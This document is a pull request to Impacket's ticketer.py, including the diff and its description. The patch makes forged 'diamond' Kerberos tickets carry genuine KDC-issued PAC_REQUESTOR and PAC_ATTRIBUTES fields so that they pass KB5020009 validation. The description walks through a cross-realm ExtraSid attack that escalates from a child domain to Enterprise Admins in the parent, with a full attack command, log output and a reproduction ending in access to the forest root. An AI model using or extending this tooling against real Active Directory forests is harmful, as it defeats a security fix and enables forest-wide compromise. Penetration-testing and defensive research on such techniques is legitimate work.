### PR TITLE
Diamond ticket: preserve KDC-issued PAC_REQUESTOR and PAC_ATTRIBUTES in -request mode

### DIFF
--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# Copyright Fortra, LLC and its affiliated companies 
+# Copyright Fortra, LLC and its affiliated companies
 #
 # All rights reserved.
 #
@@ -345,6 +345,55 @@ class TICKETER:
         pacRequestor['UserSid'].fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
 
         pacInfos[PAC_REQUESTOR_INFO] = pacRequestor.getData()
+    def _extractOriginalPacFields(self, kdcRep):
+        """Extract PAC_REQUESTOR and PAC_ATTRIBUTES from the real KDC-issued TGT.
+
+        When forging a diamond ticket (-request), the KDC's PAC contains a valid
+        PAC_REQUESTOR (KB5008380/KB5020009) that we must preserve. Without it,
+        fully-patched KDCs reject the TGS-REQ during cross-realm referral with
+        substatus 0x520 (KDC_ERR_TGT_REVOKED).
+        """
+        preserved = {}
+        try:
+            ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
+            cipherText = kdcRep['ticket']['enc-part']['cipher'].asOctets()
+
+            # Build the krbtgt key to decrypt the ticket's enc-part
+            if ticketCipher == EncryptionTypes.rc4_hmac.value:
+                key = Key(ticketCipher, unhexlify(self.__options.nthash))
+            else:
+                key = Key(ticketCipher, unhexlify(self.__options.aesKey))
+
+            cipher = _enctype_table[ticketCipher]
+            plainText = cipher.decrypt(key, 2, cipherText)
+            encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
+
+            # Walk authorization-data to find the PAC
+            adIfRelevant = decoder.decode(
+                encTicketPart['authorization-data'][0]['ad-data'],
+                asn1Spec=AD_IF_RELEVANT()
+            )[0]
+            pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())
+            buff = pacType['Buffers']
+
+            for _ in range(pacType['cBuffers']):
+                infoBuffer = pac.PAC_INFO_BUFFER(buff)
+                data = pacType['Buffers'][infoBuffer['Offset'] - 8:][:infoBuffer['cbBufferSize']]
+                buff = buff[len(infoBuffer):]
+
+                if infoBuffer['ulType'] == PAC_REQUESTOR_INFO:
+                    preserved[PAC_REQUESTOR_INFO] = data
+                    logging.info('    Preserved original PAC_REQUESTOR from KDC')
+                elif infoBuffer['ulType'] == PAC_ATTRIBUTES_INFO:
+                    preserved[PAC_ATTRIBUTES_INFO] = data
+                    logging.info('    Preserved original PAC_ATTRIBUTES from KDC')
+
+        except Exception as e:
+            logging.warning('Could not extract original PAC fields: %s' % str(e))
+            logging.warning('Falling back to fabricated PAC_REQUESTOR (may fail on patched KDCs)')
+
+        return preserved
+
 
     def createBasicTicket(self):
         if self.__options.request is True:
@@ -479,6 +528,16 @@ class TICKETER:
             kdcRep['enc-part']['cipher'] = noValue
 
         pacInfos = self.createBasicPac(kdcRep)
+
+        # Diamond ticket: preserve original PAC_REQUESTOR/PAC_ATTRIBUTES from
+        # the real KDC-issued TGT so that KB5020009 enforcement passes during
+        # cross-realm referral TGS-REQ.
+        if self.__options.request is True and not self.__options.impersonate:
+            originalPacFields = self._extractOriginalPacFields(kdcRep)
+            if PAC_REQUESTOR_INFO in originalPacFields:
+                pacInfos[PAC_REQUESTOR_INFO] = originalPacFields[PAC_REQUESTOR_INFO]
+            if PAC_ATTRIBUTES_INFO in originalPacFields:
+                pacInfos[PAC_ATTRIBUTES_INFO] = originalPacFields[PAC_ATTRIBUTES_INFO]
 
         return kdcRep, pacInfos
 
@@ -1044,7 +1103,7 @@ if __name__ == '__main__':
         print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256")
         print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as")
         print("\tbaduser.ccache.\n")
-        print("\t./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain " 
+        print("\t./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain "
               "<your domain FQDN> -request -user <a valid domain user> -password <valid domain user's password> baduser\n")
         print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used")
         print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,")

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -532,7 +532,10 @@ class TICKETER:
         # Diamond ticket: preserve original PAC_REQUESTOR/PAC_ATTRIBUTES from
         # the real KDC-issued TGT so that KB5020009 enforcement passes during
         # cross-realm referral TGS-REQ.
-        if self.__options.request is True and not self.__options.impersonate:
+        if (self.__options.request is True and not self.__options.impersonate
+                and not self.__options.old_pac
+                and self.__options.user.lower() == self.__target.lower()):
+
             originalPacFields = self._extractOriginalPacFields(kdcRep)
             if PAC_REQUESTOR_INFO in originalPacFields:
                 pacInfos[PAC_REQUESTOR_INFO] = originalPacFields[PAC_REQUESTOR_INFO]


### PR DESCRIPTION
## Introduction

When using `ticketer.py` in diamond mode (`-request` without `-impersonate`), the script requests a real TGT from the KDC but then rebuilds the PAC from scratch via `createBasicPac()`. This discards the KDC-issued `PAC_REQUESTOR` (type 18) and `PAC_ATTRIBUTES` (type 17) structures and replaces them with fabricated versions via `createRequestorInfoPac()`.

On fully patched KDCs with KB5008380/KB5020009 enforcement, this causes `KDC_ERR_TGT_REVOKED` (substatus `0x520`) during **cross-realm referral TGS-REQ**. The KDC validates whether the `PAC_REQUESTOR` in the TGT matches what it originally issued. The fabricated version, while structurally valid, was never issued by the KDC and fails this validation.

This is specifically triggered during cross-realm operations (e.g., ExtraSid golden/diamond tickets targeting a parent domain from a child domain). Intra-realm usage may work because the same KDC that issued the TGT processes the TGS-REQ, but cross-realm referrals to a different KDC expose the mismatch.


## Reproduction scenario

The patched `ticketer.py` forges a diamond ticket on Linux with `-request` and `-extra-sid` (Enterprise Admins SID from the parent domain). The resulting `.ccache` is converted to `.kirbi` and injected into a Windows SYSTEM session on a domain-joined host via `LsaRegisterLogonProcess` + `KerbSubmitTicketMessage`. Windows then handles the cross-realm referral natively using AES-256, bypassing the RC4 inter-realm trust incompatibility that breaks Linux-based cross-realm attacks.

**Before (without patch):** TGT injects successfully. `klist.exe get cifs/PARENT-DC01.parent.domain.com` triggers the cross-realm referral TGS-REQ. The KDC rejects it with substatus `0x520` (`KDC_ERR_TGT_REVOKED`) because the fabricated `PAC_REQUESTOR` does not match what the KDC originally issued. Windows LSA purges the TGT.

**After (with patch):** Same flow. The preserved `PAC_REQUESTOR` passes KDC validation. Cross-realm referral succeeds. Three tickets appear: the cross-realm TGT, the child-domain TGT, and the `cifs/` service ticket for the parent DC. Forest root `C$` is accessible.


## Why diamond mode (not sapphire)

Sapphire tickets (`-impersonate`) cannot be used for cross-realm privilege escalation via ExtraSid for three reasons:

1. **No ExtraSid support.** The `-extra-sid` logic in `customizeTicket()` is in the non-impersonate branch. Sapphire mode never processes ExtraSid.

2. **Protected Users blocks S4U2Self.** Sapphire needs to impersonate a privileged user via S4U2Self+U2U to obtain their PAC. In hardened environments, all Domain Admins and Enterprise Admins are in Protected Users, which blocks S4U2Self delegation.

3. **Different purpose.** Sapphire copies existing privilege from a real user's PAC (stealth). Diamond fabricates privilege by modifying group memberships and adding ExtraSid (escalation). When the target privilege only exists in a parent domain (Enterprise Admins) and every account holding it is protected, diamond with ExtraSid is the only viable approach.

This patch ensures diamond mode works against fully patched KDCs where KB5020009 enforcement rejects the fabricated `PAC_REQUESTOR` during cross-realm referral.


## What this PR does

Adds `_extractOriginalPacFields()` method that:

1. Decrypts the real TGT's `EncTicketPart` using the krbtgt key (already required for diamond mode)
2. Walks the PAC buffer entries
3. Preserves the KDC-issued `PAC_REQUESTOR` and `PAC_ATTRIBUTES` structures

After `createBasicPac()` rebuilds the PAC with modified group memberships and ExtraSid, the preserved originals overwrite the fabricated entries. The PAC signatures are then recomputed with the krbtgt key as usual.

This only applies to diamond mode (`-request` without `-impersonate`). Sapphire mode (`-impersonate`) is unaffected as it has its own PAC handling via S4U2Self+U2U.

## Failure case without this patch

```
# Cross-realm diamond ticket with ExtraSid (child → parent)
ticketer.py -request -domain child.domain.com \
  -domain-sid S-1-5-21-... -user 'MACHINE$' \
  -hashes ':...' -nthash '...' -aesKey '...' \
  -extra-sid S-1-5-21-...-519 \
  -dc-ip 10.x.x.x 'MACHINE$'

# Inject into Windows SYSTEM session, request cross-realm service ticket:
# → KDC_ERR_TGT_REVOKED (0x520) during referral TGS-REQ
# → Windows LSA purges the TGT from cache
```
<img width="1168" height="388" alt="image" src="https://github.com/user-attachments/assets/cf96bb10-210b-4567-a177-22852b7f90a8" />

## With this patch

```
[*] Requesting TGT to target domain to use as basis
[*]     Preserved original PAC_ATTRIBUTES from KDC
[*]     Preserved original PAC_REQUESTOR from KDC
[*] Customizing ticket for child.domain.com/MACHINE$
...
[*] Saving ticket in MACHINE$.ccache

# Cross-realm referral succeeds, service ticket obtained
```
<img width="939" height="728" alt="image" src="https://github.com/user-attachments/assets/8586a6b2-01b5-4635-9662-3b4a47ed590d" />

<img width="1024" height="392" alt="image" src="https://github.com/user-attachments/assets/5a954379-af81-48c5-9e9c-1398ee62f33c" />



## Testing

Tested against Windows Server 2022 DCs (build 20348) with KB5020009 enforcement enabled, in a multi-domain forest with RC4 inter-realm trust keys. Cross-realm ExtraSid diamond ticket with Enterprise Admins SID successfully obtained cross-realm service tickets after the patch. Without the patch, the same configuration failed with `0x520` on every attempt.

## Notes

- The `-old-pac` flag bypasses this entirely (no PAC_REQUESTOR/PAC_ATTRIBUTES at all)
- Falls back gracefully to fabricated PAC_REQUESTOR if decryption fails (with a warning)
- No new dependencies, no new CLI arguments